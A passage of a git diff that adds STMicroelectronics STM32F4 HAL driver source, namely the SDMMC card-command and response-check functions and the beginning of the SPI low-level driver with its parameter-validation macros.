Idle State command and check the response. + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdGoIdleState(SDIO_TypeDef *SDIOx) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + sdmmc_cmdinit.Argument = 0U; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_GO_IDLE_STATE; + sdmmc_cmdinit.Response = SDIO_RESPONSE_NO; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdError(SDIOx); + + return errorstate; +} + +/** + * @brief Send the Operating Condition command and check the response. + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdOperCond(SDIO_TypeDef *SDIOx) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Send CMD8 to verify SD card interface operating condition */ + /* Argument: - [31:12]: Reserved (shall be set to '0') + - [11:8]: Supply Voltage (VHS) 0x1 (Range: 2.7-3.6 V) + - [7:0]: Check Pattern (recommended 0xAA) */ + /* CMD Response: R7 */ + sdmmc_cmdinit.Argument = SDMMC_CHECK_PATTERN; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_HS_SEND_EXT_CSD; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp7(SDIOx); + + return errorstate; +} + +/** + * @brief Send the Application command to verify that that the next command + * is an application specific com-mand rather than a standard command + * and check the response. + * @param SDIOx: Pointer to SDIO register base + * @param Argument: Command Argument + * @retval HAL status + */ +uint32_t SDMMC_CmdAppCommand(SDIO_TypeDef *SDIOx, uint32_t Argument) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + sdmmc_cmdinit.Argument = (uint32_t)Argument; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_APP_CMD; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + /* If there is a HAL_ERROR, it is a MMC card, else + it is a SD card: SD card 2.0 (voltage range mismatch) + or SD card 1.x */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_APP_CMD, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the command asking the accessed card to send its operating + * condition register (OCR) + * @param SDIOx: Pointer to SDIO register base + * @param Argument: Command Argument + * @retval HAL status + */ +uint32_t SDMMC_CmdAppOperCommand(SDIO_TypeDef *SDIOx, uint32_t Argument) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + sdmmc_cmdinit.Argument = SDMMC_VOLTAGE_WINDOW_SD | Argument; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_SD_APP_OP_COND; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp3(SDIOx); + + return errorstate; +} + +/** + * @brief Send the Bus Width command and check the response. + * @param SDIOx: Pointer to SDIO register base + * @param BusWidth: BusWidth + * @retval HAL status + */ +uint32_t SDMMC_CmdBusWidth(SDIO_TypeDef *SDIOx, uint32_t BusWidth) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + sdmmc_cmdinit.Argument = (uint32_t)BusWidth; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_APP_SD_SET_BUSWIDTH; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_APP_SD_SET_BUSWIDTH, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the Send SCR command and check the response. + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdSendSCR(SDIO_TypeDef *SDIOx) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Send CMD51 SD_APP_SEND_SCR */ + sdmmc_cmdinit.Argument = 0U; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_SD_APP_SEND_SCR; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_SD_APP_SEND_SCR, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the Send CID command and check the response. + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdSendCID(SDIO_TypeDef *SDIOx) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Send CMD2 ALL_SEND_CID */ + sdmmc_cmdinit.Argument = 0U; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_ALL_SEND_CID; + sdmmc_cmdinit.Response = SDIO_RESPONSE_LONG; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp2(SDIOx); + + return errorstate; +} + +/** + * @brief Send the Send CSD command and check the response. + * @param SDIOx: Pointer to SDIO register base + * @param Argument: Command Argument + * @retval HAL status + */ +uint32_t SDMMC_CmdSendCSD(SDIO_TypeDef *SDIOx, uint32_t Argument) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Send CMD9 SEND_CSD */ + sdmmc_cmdinit.Argument = Argument; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_SEND_CSD; + sdmmc_cmdinit.Response = SDIO_RESPONSE_LONG; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp2(SDIOx); + + return errorstate; +} + +/** + * @brief Send the Send CSD command and check the response. + * @param SDIOx: Pointer to SDIO register base + * @param pRCA: Card RCA + * @retval HAL status + */ +uint32_t SDMMC_CmdSetRelAdd(SDIO_TypeDef *SDIOx, uint16_t *pRCA) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Send CMD3 SD_CMD_SET_REL_ADDR */ + sdmmc_cmdinit.Argument = 0U; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_SET_REL_ADDR; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp6(SDIOx, SDMMC_CMD_SET_REL_ADDR, pRCA); + + return errorstate; +} + +/** + * @brief Send the Status command and check the response. + * @param SDIOx: Pointer to SDIO register base + * @param Argument: Command Argument + * @retval HAL status + */ +uint32_t SDMMC_CmdSendStatus(SDIO_TypeDef *SDIOx, uint32_t Argument) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + sdmmc_cmdinit.Argument = Argument; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_SEND_STATUS; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_SEND_STATUS, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Send the Status register command and check the response. + * @param SDIOx: Pointer to SDIO register base + * @retval HAL status + */ +uint32_t SDMMC_CmdStatusRegister(SDIO_TypeDef *SDIOx) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + sdmmc_cmdinit.Argument = 0U; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_SD_APP_STATUS; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_SD_APP_STATUS, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @brief Sends host capacity support information and activates the card's + * initialization process. Send SDMMC_CMD_SEND_OP_COND command + * @param SDIOx: Pointer to SDIO register base + * @parame Argument: Argument used for the command + * @retval HAL status + */ +uint32_t SDMMC_CmdOpCondition(SDIO_TypeDef *SDIOx, uint32_t Argument) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + sdmmc_cmdinit.Argument = Argument; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_SEND_OP_COND; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp3(SDIOx); + + return errorstate; +} + +/** + * @brief Checks switchable function and switch card function. SDMMC_CMD_HS_SWITCH command + * @param SDIOx: Pointer to SDIO register base + * @parame Argument: Argument used for the command + * @retval HAL status + */ +uint32_t SDMMC_CmdSwitch(SDIO_TypeDef *SDIOx, uint32_t Argument) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Send CMD6 to activate SDR50 Mode and Power Limit 1.44W */ + /* CMD Response: R1 */ + sdmmc_cmdinit.Argument = Argument; /* SDMMC_SDR25_SWITCH_PATTERN */ + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_HS_SWITCH; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_HS_SWITCH, SDIO_CMDTIMEOUT); + + return errorstate; +} + +/** + * @} + */ + +/* Private function ----------------------------------------------------------*/ +/** @addtogroup SD_Private_Functions + * @{ + */ + +/** + * @brief Checks for error conditions for CMD0. + * @param hsd: SD handle + * @retval SD Card error state + */ +static uint32_t SDMMC_GetCmdError(SDIO_TypeDef *SDIOx) +{ + /* 8 is the number of required instructions cycles for the below loop statement. + The SDIO_CMDTIMEOUT is expressed in ms */ + uint32_t count = SDIO_CMDTIMEOUT * (SystemCoreClock / 8U /1000U); + + do + { + if (count-- == 0U) + { + return SDMMC_ERROR_TIMEOUT; + } + + }while(!__SDIO_GET_FLAG(SDIOx, SDIO_FLAG_CMDSENT)); + + /* Clear all the static flags */ + __SDIO_CLEAR_FLAG(SDIOx, SDIO_STATIC_CMD_FLAGS); + + return SDMMC_ERROR_NONE; +} + +/** + * @brief Checks for error conditions for R1 response. + * @param hsd: SD handle + * @param SD_CMD: The sent command index + * @retval SD Card error state + */ +static uint32_t SDMMC_GetCmdResp1(SDIO_TypeDef *SDIOx, uint8_t SD_CMD, uint32_t Timeout) +{ + uint32_t response_r1; + uint32_t sta_reg; + + /* 8 is the number of required instructions cycles for the below loop statement. + The Timeout is expressed in ms */ + uint32_t count = Timeout * (SystemCoreClock / 8U /1000U); + + do + { + if (count-- == 0U) + { + return SDMMC_ERROR_TIMEOUT; + } + sta_reg = SDIOx->STA; + }while(((sta_reg & (SDIO_FLAG_CCRCFAIL | SDIO_FLAG_CMDREND | SDIO_FLAG_CTIMEOUT)) == 0U) || + ((sta_reg & SDIO_FLAG_CMDACT) != 0U )); + + if(__SDIO_GET_FLAG(SDIOx, SDIO_FLAG_CTIMEOUT)) + { + __SDIO_CLEAR_FLAG(SDIOx, SDIO_FLAG_CTIMEOUT); + + return SDMMC_ERROR_CMD_RSP_TIMEOUT; + } + else if(__SDIO_GET_FLAG(SDIOx, SDIO_FLAG_CCRCFAIL)) + { + __SDIO_CLEAR_FLAG(SDIOx, SDIO_FLAG_CCRCFAIL); + + return SDMMC_ERROR_CMD_CRC_FAIL; + } + else + { + /* Nothing to do */ + } + + /* Clear all the static flags */ + __SDIO_CLEAR_FLAG(SDIOx, SDIO_STATIC_CMD_FLAGS); + + /* Check response received is of desired command */ + if(SDIO_GetCommandResponse(SDIOx) != SD_CMD) + { + return SDMMC_ERROR_CMD_CRC_FAIL; + } + + /* We have received response, retrieve it for analysis */ + response_r1 = SDIO_GetResponse(SDIOx, SDIO_RESP1); + + if((response_r1 & SDMMC_OCR_ERRORBITS) == SDMMC_ALLZERO) + { + return SDMMC_ERROR_NONE; + } + else if((response_r1 & SDMMC_OCR_ADDR_OUT_OF_RANGE) == SDMMC_OCR_ADDR_OUT_OF_RANGE) + { + return SDMMC_ERROR_ADDR_OUT_OF_RANGE; + } + else if((response_r1 & SDMMC_OCR_ADDR_MISALIGNED) == SDMMC_OCR_ADDR_MISALIGNED) + { + return SDMMC_ERROR_ADDR_MISALIGNED; + } + else if((response_r1 & SDMMC_OCR_BLOCK_LEN_ERR) == SDMMC_OCR_BLOCK_LEN_ERR) + { + return SDMMC_ERROR_BLOCK_LEN_ERR; + } + else if((response_r1 & SDMMC_OCR_ERASE_SEQ_ERR) == SDMMC_OCR_ERASE_SEQ_ERR) + { + return SDMMC_ERROR_ERASE_SEQ_ERR; + } + else if((response_r1 & SDMMC_OCR_BAD_ERASE_PARAM) == SDMMC_OCR_BAD_ERASE_PARAM) + { + return SDMMC_ERROR_BAD_ERASE_PARAM; + } + else if((response_r1 & SDMMC_OCR_WRITE_PROT_VIOLATION) == SDMMC_OCR_WRITE_PROT_VIOLATION) + { + return SDMMC_ERROR_WRITE_PROT_VIOLATION; + } + else if((response_r1 & SDMMC_OCR_LOCK_UNLOCK_FAILED) == SDMMC_OCR_LOCK_UNLOCK_FAILED) + { + return SDMMC_ERROR_LOCK_UNLOCK_FAILED; + } + else if((response_r1 & SDMMC_OCR_COM_CRC_FAILED) == SDMMC_OCR_COM_CRC_FAILED) + { + return SDMMC_ERROR_COM_CRC_FAILED; + } + else if((response_r1 & SDMMC_OCR_ILLEGAL_CMD) == SDMMC_OCR_ILLEGAL_CMD) + { + return SDMMC_ERROR_ILLEGAL_CMD; + } + else if((response_r1 & SDMMC_OCR_CARD_ECC_FAILED) == SDMMC_OCR_CARD_ECC_FAILED) + { + return SDMMC_ERROR_CARD_ECC_FAILED; + } + else if((response_r1 & SDMMC_OCR_CC_ERROR) == SDMMC_OCR_CC_ERROR) + { + return SDMMC_ERROR_CC_ERR; + } + else if((response_r1 & SDMMC_OCR_STREAM_READ_UNDERRUN) == SDMMC_OCR_STREAM_READ_UNDERRUN) + { + return SDMMC_ERROR_STREAM_READ_UNDERRUN; + } + else if((response_r1 & SDMMC_OCR_STREAM_WRITE_OVERRUN) == SDMMC_OCR_STREAM_WRITE_OVERRUN) + { + return SDMMC_ERROR_STREAM_WRITE_OVERRUN; + } + else if((response_r1 & SDMMC_OCR_CID_CSD_OVERWRITE) == SDMMC_OCR_CID_CSD_OVERWRITE) + { + return SDMMC_ERROR_CID_CSD_OVERWRITE; + } + else if((response_r1 & SDMMC_OCR_WP_ERASE_SKIP) == SDMMC_OCR_WP_ERASE_SKIP) + { + return SDMMC_ERROR_WP_ERASE_SKIP; + } + else if((response_r1 & SDMMC_OCR_CARD_ECC_DISABLED) == SDMMC_OCR_CARD_ECC_DISABLED) + { + return SDMMC_ERROR_CARD_ECC_DISABLED; + } + else if((response_r1 & SDMMC_OCR_ERASE_RESET) == SDMMC_OCR_ERASE_RESET) + { + return SDMMC_ERROR_ERASE_RESET; + } + else if((response_r1 & SDMMC_OCR_AKE_SEQ_ERROR) == SDMMC_OCR_AKE_SEQ_ERROR) + { + return SDMMC_ERROR_AKE_SEQ_ERR; + } + else + { + return SDMMC_ERROR_GENERAL_UNKNOWN_ERR; + } +} + +/** + * @brief Checks for error conditions for R2 (CID or CSD) response. + * @param hsd: SD handle + * @retval SD Card error state + */ +static uint32_t SDMMC_GetCmdResp2(SDIO_TypeDef *SDIOx) +{ + uint32_t sta_reg; + /* 8 is the number of required instructions cycles for the below loop statement. + The SDIO_CMDTIMEOUT is expressed in ms */ + uint32_t count = SDIO_CMDTIMEOUT * (SystemCoreClock / 8U /1000U); + + do + { + if (count-- == 0U) + { + return SDMMC_ERROR_TIMEOUT; + } + sta_reg = SDIOx->STA; + }while(((sta_reg & (SDIO_FLAG_CCRCFAIL | SDIO_FLAG_CMDREND | SDIO_FLAG_CTIMEOUT)) == 0U) || + ((sta_reg & SDIO_FLAG_CMDACT) != 0U )); + + if (__SDIO_GET_FLAG(SDIOx, SDIO_FLAG_CTIMEOUT)) + { + __SDIO_CLEAR_FLAG(SDIOx, SDIO_FLAG_CTIMEOUT); + + return SDMMC_ERROR_CMD_RSP_TIMEOUT; + } + else if (__SDIO_GET_FLAG(SDIOx, SDIO_FLAG_CCRCFAIL)) + { + __SDIO_CLEAR_FLAG(SDIOx, SDIO_FLAG_CCRCFAIL); + + return SDMMC_ERROR_CMD_CRC_FAIL; + } + else + { + /* No error flag set */ + /* Clear all the static flags */ + __SDIO_CLEAR_FLAG(SDIOx, SDIO_STATIC_CMD_FLAGS); + } + + return SDMMC_ERROR_NONE; +} + +/** + * @brief Checks for error conditions for R3 (OCR) response. + * @param hsd: SD handle + * @retval SD Card error state + */ +static uint32_t SDMMC_GetCmdResp3(SDIO_TypeDef *SDIOx) +{ + uint32_t sta_reg; + /* 8 is the number of required instructions cycles for the below loop statement. + The SDIO_CMDTIMEOUT is expressed in ms */ + uint32_t count = SDIO_CMDTIMEOUT * (SystemCoreClock / 8U /1000U); + + do + { + if (count-- == 0U) + { + return SDMMC_ERROR_TIMEOUT; + } + sta_reg = SDIOx->STA; + }while(((sta_reg & (SDIO_FLAG_CCRCFAIL | SDIO_FLAG_CMDREND | SDIO_FLAG_CTIMEOUT)) == 0U) || + ((sta_reg & SDIO_FLAG_CMDACT) != 0U )); + + if(__SDIO_GET_FLAG(SDIOx, SDIO_FLAG_CTIMEOUT)) + { + __SDIO_CLEAR_FLAG(SDIOx, SDIO_FLAG_CTIMEOUT); + + return SDMMC_ERROR_CMD_RSP_TIMEOUT; + } + else + { + /* Clear all the static flags */ + __SDIO_CLEAR_FLAG(SDIOx, SDIO_STATIC_CMD_FLAGS); + } + + return SDMMC_ERROR_NONE; +} + +/** + * @brief Checks for error conditions for R6 (RCA) response. + * @param hsd: SD handle + * @param SD_CMD: The sent command index + * @param pRCA: Pointer to the variable that will contain the SD card relative + * address RCA + * @retval SD Card error state + */ +static uint32_t SDMMC_GetCmdResp6(SDIO_TypeDef *SDIOx, uint8_t SD_CMD, uint16_t *pRCA) +{ + uint32_t response_r1; + uint32_t sta_reg; + + /* 8 is the number of required instructions cycles for the below loop statement. + The SDIO_CMDTIMEOUT is expressed in ms */ + uint32_t count = SDIO_CMDTIMEOUT * (SystemCoreClock / 8U /1000U); + + do + { + if (count-- == 0U) + { + return SDMMC_ERROR_TIMEOUT; + } + sta_reg = SDIOx->STA; + }while(((sta_reg & (SDIO_FLAG_CCRCFAIL | SDIO_FLAG_CMDREND | SDIO_FLAG_CTIMEOUT)) == 0U) || + ((sta_reg & SDIO_FLAG_CMDACT) != 0U )); + + if(__SDIO_GET_FLAG(SDIOx, SDIO_FLAG_CTIMEOUT)) + { + __SDIO_CLEAR_FLAG(SDIOx, SDIO_FLAG_CTIMEOUT); + + return SDMMC_ERROR_CMD_RSP_TIMEOUT; + } + else if(__SDIO_GET_FLAG(SDIOx, SDIO_FLAG_CCRCFAIL)) + { + __SDIO_CLEAR_FLAG(SDIOx, SDIO_FLAG_CCRCFAIL); + + return SDMMC_ERROR_CMD_CRC_FAIL; + } + else + { + /* Nothing to do */ + } + + /* Check response received is of desired command */ + if(SDIO_GetCommandResponse(SDIOx) != SD_CMD) + { + return SDMMC_ERROR_CMD_CRC_FAIL; + } + + /* Clear all the static flags */ + __SDIO_CLEAR_FLAG(SDIOx, SDIO_STATIC_CMD_FLAGS); + + /* We have received response, retrieve it. */ + response_r1 = SDIO_GetResponse(SDIOx, SDIO_RESP1); + + if((response_r1 & (SDMMC_R6_GENERAL_UNKNOWN_ERROR | SDMMC_R6_ILLEGAL_CMD | SDMMC_R6_COM_CRC_FAILED)) == SDMMC_ALLZERO) + { + *pRCA = (uint16_t) (response_r1 >> 16); + + return SDMMC_ERROR_NONE; + } + else if((response_r1 & SDMMC_R6_ILLEGAL_CMD) == SDMMC_R6_ILLEGAL_CMD) + { + return SDMMC_ERROR_ILLEGAL_CMD; + } + else if((response_r1 & SDMMC_R6_COM_CRC_FAILED) == SDMMC_R6_COM_CRC_FAILED) + { + return SDMMC_ERROR_COM_CRC_FAILED; + } + else + { + return SDMMC_ERROR_GENERAL_UNKNOWN_ERR; + } +} + +/** + * @brief Checks for error conditions for R7 response. + * @param hsd: SD handle + * @retval SD Card error state + */ +static uint32_t SDMMC_GetCmdResp7(SDIO_TypeDef *SDIOx) +{ + uint32_t sta_reg; + /* 8 is the number of required instructions cycles for the below loop statement. + The SDIO_CMDTIMEOUT is expressed in ms */ + uint32_t count = SDIO_CMDTIMEOUT * (SystemCoreClock / 8U /1000U); + + do + { + if (count-- == 0U) + { + return SDMMC_ERROR_TIMEOUT; + } + sta_reg = SDIOx->STA; + }while(((sta_reg & (SDIO_FLAG_CCRCFAIL | SDIO_FLAG_CMDREND | SDIO_FLAG_CTIMEOUT)) == 0U) || + ((sta_reg & SDIO_FLAG_CMDACT) != 0U )); + + if(__SDIO_GET_FLAG(SDIOx, SDIO_FLAG_CTIMEOUT)) + { + /* Card is SD V2.0 compliant */ + __SDIO_CLEAR_FLAG(SDIOx, SDIO_FLAG_CTIMEOUT); + + return SDMMC_ERROR_CMD_RSP_TIMEOUT; + } + else if(__SDIO_GET_FLAG(SDIOx, SDIO_FLAG_CCRCFAIL)) + { + /* Card is SD V2.0 compliant */ + __SDIO_CLEAR_FLAG(SDIOx, SDIO_FLAG_CCRCFAIL); + + return SDMMC_ERROR_CMD_CRC_FAIL; + } + else + { + /* Nothing to do */ + } + + if(__SDIO_GET_FLAG(SDIOx, SDIO_FLAG_CMDREND)) + { + /* Card is SD V2.0 compliant */ + __SDIO_CLEAR_FLAG(SDIOx, SDIO_FLAG_CMDREND); + } + + return SDMMC_ERROR_NONE; + +} + +/** + * @brief Send the Send EXT_CSD command and check the response. + * @param SDIOx: Pointer to SDMMC register base + * @param Argument: Command Argument + * @retval HAL status + */ +uint32_t SDMMC_CmdSendEXTCSD(SDIO_TypeDef *SDIOx, uint32_t Argument) +{ + SDIO_CmdInitTypeDef sdmmc_cmdinit; + uint32_t errorstate; + + /* Send CMD9 SEND_CSD */ + sdmmc_cmdinit.Argument = Argument; + sdmmc_cmdinit.CmdIndex = SDMMC_CMD_HS_SEND_EXT_CSD; + sdmmc_cmdinit.Response = SDIO_RESPONSE_SHORT; + sdmmc_cmdinit.WaitForInterrupt = SDIO_WAIT_NO; + sdmmc_cmdinit.CPSM = SDIO_CPSM_ENABLE; + (void)SDIO_SendCommand(SDIOx, &sdmmc_cmdinit); + + /* Check for error conditions */ + errorstate = SDMMC_GetCmdResp1(SDIOx, SDMMC_CMD_HS_SEND_EXT_CSD,SDIO_CMDTIMEOUT); + + return errorstate; +} + + +/** + * @} + */ + +#endif /* HAL_SD_MODULE_ENABLED || HAL_MMC_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +#endif /* SDIO */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_spi.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_spi.c new file mode 100644 index 000000000..2fde18057 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_spi.c @@ -0,0 +1,626 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_spi.c + * @author MCD Application Team + * @brief SPI LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_spi.h" +#include "stm32f4xx_ll_bus.h" +#include "stm32f4xx_ll_rcc.h" + +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif /* USE_FULL_ASSERT */ + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined (SPI1) || defined (SPI2) || defined (SPI3) || defined (SPI4) || defined (SPI5) || defined(SPI6) + +/** @addtogroup SPI_LL + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ + +/* Private constants ---------------------------------------------------------*/ +/** @defgroup SPI_LL_Private_Constants SPI Private Constants + * @{ + */ +/* SPI registers Masks */ +#define SPI_CR1_CLEAR_MASK (SPI_CR1_CPHA | SPI_CR1_CPOL | SPI_CR1_MSTR | \ + SPI_CR1_BR | SPI_CR1_LSBFIRST | SPI_CR1_SSI | \ + SPI_CR1_SSM | SPI_CR1_RXONLY | SPI_CR1_DFF | \ + SPI_CR1_CRCNEXT | SPI_CR1_CRCEN | SPI_CR1_BIDIOE | \ + SPI_CR1_BIDIMODE) +/** + * @} + */ + +/* Private macros ------------------------------------------------------------*/ +/** @defgroup SPI_LL_Private_Macros SPI Private Macros + * @{ + */ +#define IS_LL_SPI_TRANSFER_DIRECTION(__VALUE__) (((__VALUE__) == LL_SPI_FULL_DUPLEX) \ + || ((__VALUE__) == LL_SPI_SIMPLEX_RX) \ + || ((__VALUE__) == LL_SPI_HALF_DUPLEX_RX) \ + || ((__VALUE__) == LL_SPI_HALF_DUPLEX_TX)) + +#define IS_LL_SPI_MODE(__VALUE__) (((__VALUE__) == LL_SPI_MODE_MASTER) \ + || ((__VALUE__) == LL_SPI_MODE_SLAVE)) + +#define IS_LL_SPI_DATAWIDTH(__VALUE__) (((__VALUE__) == LL_SPI_DATAWIDTH_8BIT) \ + || ((__VALUE__) == LL_SPI_DATAWIDTH_16BIT)) + +#define IS_LL_SPI_POLARITY(__VALUE__) (((__VALUE__) == LL_SPI_POLARITY_LOW) \ + || ((__VALUE__) == LL_SPI_POLARITY_HIGH)) + +#define IS_LL_SPI_PHASE(__VALUE__) (((__VALUE__) == LL_SPI_PHASE_1EDGE) \ + || ((__VALUE__) == LL_SPI_PHASE_2EDGE)) + +#define IS_LL_SPI_NSS(__VALUE__) (((__VALUE__) == LL_SPI_NSS_SOFT) \ + || ((__VALUE__) == LL_SPI_NSS_HARD_INPUT) \ + || ((__VALUE__) == LL_SPI_NSS_HARD_OUTPUT)) + +#define IS_LL_SPI_BAUDRATE(__VALUE__) (((__VALUE__) == LL_SPI_BAUDRATEPRESCALER_DIV2) \ + || ((__VALUE__) == LL_SPI_BAUDRATEPRESCALER_DIV4) \ + || ((__VALUE__) == LL_SPI_BAUDRATEPRESCALER_DIV8) \ + || ((__VALUE__) == LL_SPI_BAUDRATEPRESCALER_DIV16) \ + || ((__VALUE__) == LL_SPI_BAUDRATEPRESCALER_DIV32) \ + || ((__VALUE__) == LL_SPI_BAUDRATEPRESCALER_DIV64) \ + || ((__VALUE__) == LL_SPI_BAUDRATEPRESCALER_DIV128) \ + || ((__VALUE__) == LL_SPI_BAUDRATEPRESCALER_DIV256)) + +#define IS_LL_SPI_BITORDER(__VALUE__) (((__VALUE__) == LL_SPI_LSB_FIRST) \ + || ((__VALUE__) == LL_SPI_MSB_FIRST)) + +#define IS_LL_SPI_CRCCALCULATION(__VALUE__) (((__VALUE__) == LL_SPI_CRCCALCULATION_ENABLE) \ + || ((__VALUE__) == LL_SPI_CRCCALCULATION_DISABLE)) 